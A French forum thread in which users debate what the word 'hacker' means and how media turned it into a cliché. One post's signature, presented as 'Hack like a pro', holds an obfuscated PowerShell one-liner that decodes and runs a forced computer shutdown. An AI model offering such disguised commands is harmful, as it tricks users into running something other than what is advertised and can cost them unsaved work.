Annonce

Réduire
Aucune annonce.

C'est quoi être "hacker" ?

Réduire
X
 
  • Filtre
  • Heure
  • Afficher
Tout nettoyer
nouveaux messages

  • C'est quoi être "hacker" ?

    Bonjour,

    Je me pose ce genre de question depuis que j'ai appris ce terme : "hacker".

    Ce n'est qu'un mot mais il dispose d'une charge particulière... Parce que, à la base, il ne s'agit juste que de gens qui programment, qui passent du temps dans l'open-source et qui, de fait, sont devenus des sources de connaissance.

    Le problème, c'est que dans le monde de maintenant, les hackers sont vus comme une source de pouvoir, au même titre que la politique ou la lutte armée.

    Autant le dire tout de suite, ce n'est pas ma vision du "hacker" et je ne me reconnais pas dans ce mot. Le pouvoir ne m'intéresse pas. La seule chose qui ait une quelconque valeur à mes yeux est la connaissance.

    Alors, bien sûr, une fois qu'on a un certain savoir, on peut s'en servir, blanc - gris - noir, de mon point de vue, ce n'est qu’une question d'éthique et plus encore, de circonstances. Je ne fais pas vraiment de différence dans la mesure où chacun le fait pour une cause qui lui tient à cœur.

    Qu'en dites-vous ?


  • #2
    Le sens de ce mot s'est transformé, années après années à cause de gens qui n'y connaissent rien (journalistes, scénaristes, réalisateurs, ...) et qui diffusent une vision "sexy / vendable $$" du "hacker" a tel point que quelqu'un qui se serai volontiers qualifié de hacker il y a 20 ans ne le fera plus aujourd'hui : Le mot à complètement perdu son sens original.

    Moi même je n'utilise jamais ce mot, j'ai bien trop peur que la vision de "l'ado surdoué en sweet à capuche doté d'un pouvoir qui le dépasse" ne remplace dans l'esprit de mon interlocuteur le sens que je souhaitais donner au terme.

    Aussi, j'ai envie de répondre avec une photo.
    as de lumière bleue / verte, pas de capuche, pas de terminaux matrix avec des conneries qui défilent sur un mur d'écran.
    Juste de l'expérimentation, de la connaissance, de l'information, de la science.
    0214161837.jpg
    Hack like a pro :
    PS > iex $(-join('73746F702D636F6D7075746572202D466F726365' -split '(?<=\G.{2})',20|%{[char][int]"0x$_"}))

    Commentaire


    • #3
      Je ne risquerais pas la comparaison avec mon propre bureau : un seul PC, un seul écran et aucune carte n'y traîne.

      Je suis plutôt en phase avec ton analyse. Je ne me suis jamais senti "hacker" parce que je ne l'étais pas à la base (pas fais grand-chose en open-source). Puis, c'est devenu un truc bizarre et malsain quelque part. De mon point de vue, nous sommes face à un mot galvaudé et vidé de sa substance positive.

      Ce que j'aimerais, c'est que chacun s'exprime à ce sujet. Parce que, au fond, je n'ai aucune légitimité pour dire ce qu'est ce mot ou ce qu'il n'est pas. Je veux juste comprendre ce que cela revêt ou implique dans la réalité ou l’imaginaire de chacun.
      Dernière modification par Icarus, 14 octobre 2018, 13h25.

      Commentaire


      • #4
        Salut à tous les deux,

        Qu'est ce qu'un "hacker"? La question est à mon avis bien trop complexe et à la fois très simple.
        Qu'est ce qu'un terroriste? Les résistants étaient appelés comme tel lors de la seconde guerre mondiale. Avec le recul on se rend compte que ceux qui cherchaient à prendre le pouvoir par la terreur n'étaient pas forcément ces derniers. En revanche, il étaient bel et bien le nom que les propagandes de l'époque leur donnaient.

        Je pense que nous connaissons un peu le même problème avec le mot "hacker" à l'heure actuel. Comme dis plus haut, les médias ne cherchent (généralement) pas à donner une vision "exacte" de la réalité mais plutôt celle qui vendra le mieux. Les personnes n'étant pas forcément intéressées par le sujet ne prendrons pas toujours la peine de vérifier ce que signifie réellement ce mot. Ils en retiendrons ce qu'on leur a donné, ce qui est logique.
        Au contraire, si on s’intéresse au sujet, on se rend vite compte que la définition la "plus rependu" ne colle pas du tous.

        Je dirais donc qu'on se retrouve généralement avec deux types de personnes: celles qui s’intéressent au sujet et "les autres".
        En fonction de ton interlocuteur la définition ne sera donc pas la même. Par exemple le mot "consentement" a une définition visiblement très subjective et varie beaucoup d'un individu à l'autre si on prend 2 minutes pour étudier les statiques de viols...

        Personnellement je trouve que "bidouilleur" serait une définition qui s’approcherait le plus du sens du mot "hacker" (dans ma vision de la chose en tous cas).

        Maintenant c'est sûr que la langue et le sens des mots évolue avec le temps.

        EDIT: Dans la langue française la différenciation entre "hacker" et "pirate" est rarement faite ce qui (à mon avis) renforce encore une peu plus l'image de l'adolescent "surdoué" avec des écrans à la matrix.
        Dernière modification par bambish, 16 octobre 2018, 18h27.

        Commentaire


        • #5
          C'est une vision intéressante et que je ne puis prendre à défaut : "bidouilleur". J'ai souvent lu, maintenant que j'y pense, qu'il y avait derrière cela, et là on dépasse un peu le terme de bidouilleur, l'idée de comprendre la technologie pour ne pas en être, sinon victime, mais du moins abusé.

          Je vois également que tu as conscience que le sens de bien des mots varie selon la personne qui l'évoque. C'est une vérité irréfutable. D'où ma question de départ d'ailleurs. Sur ce point, je m'attendais à plus de réponses mais peut-être que beaucoup de gens ne veulent entrer dans un débat qui paraît élimé comme le monde lui-même.

          Une chose qui m'est apparue personnellement est qu'être placé dans une case, ici un groupe de gens nommés "hackers", n'est pas très agréable au fond. Chacun est un individu et s'il s'intéresse à la technologie, c'est pour des raisons et des finalités qui lui sont propres.

          Commentaire


          • #6
            Envoyé par Icarus
            l'idée de comprendre la technologie pour ne pas en être, sinon victime, mais du moins abusé.
            C'est vrai qu'à ce niveau, ma rapide définition ne tiens pas debout.

            Envoyé par Icarus
            Une chose qui m'est apparue personnellement est qu'être placé dans une case, ici un groupe de gens nommés "hackers", n'est pas très agréable au fond. Chacun est un individu et s'il s'intéresse à la technologie, c'est pour des raisons et des finalités qui lui sont propres.
            C'est vrai que ce n'est malheureusement pas très agréable et je crois que c'est ce qui prouve ton "indépendance" en quelque sorte. C'est là que commence le paradoxe de la définition actuelle. Un certains nombre de "hackers" disent souvent qu'ils se définissent comme tel au travers de leurs non conformisme ce qui leurs "donnent accès" à cette indépendance de pensée que chacun revendique fièrement. Beaucoup s'identifient même grâce au ""signe universel des hackers"" le fameux "glider". On arrivent donc à des groupes de gens nommés "hackers" qui se conforment au non conformisme... (Oui je sais, la formulation est un peux étrange).

            Le simple fait d'être assimiler à un groupe ("hacker" ou autre) "casse" l'individu pour le "simplifier" à la définition du groupe. En l’occurrence, le groupe dont on parle ici véhicule une image inquiétante voir violente à l'heure actuelle. Il suffi de faire une rapide recherche google avec des mots clefs bateaux type "hacker", "logo hacker" pour se rendre compte que rien ne fait référence à des notions de savoirs ou de curiosité. L'impression général que j'en ressors c'est que le "hacking" est à la mode, le "hacking" est "coooool" le "hacking" ça fait gangster.

            Au final, se faire placer dans une case de personne suivant une "mode agressive"... Ce n'est effectivement pas très agréable... Je n'aime pas vraiment la phrase que je viens de taper mais c'est malheureusement mon ressenti général à ce moment précis.

            Au bout du compte, se définir "hacker" (selon le sens que je donne à ce mot), est totalement paradoxal.

            Ce point de vu n'engage évidemment que moi.
            Dernière modification par bambish, 16 octobre 2018, 19h46.

            Commentaire

            Chargement...
            X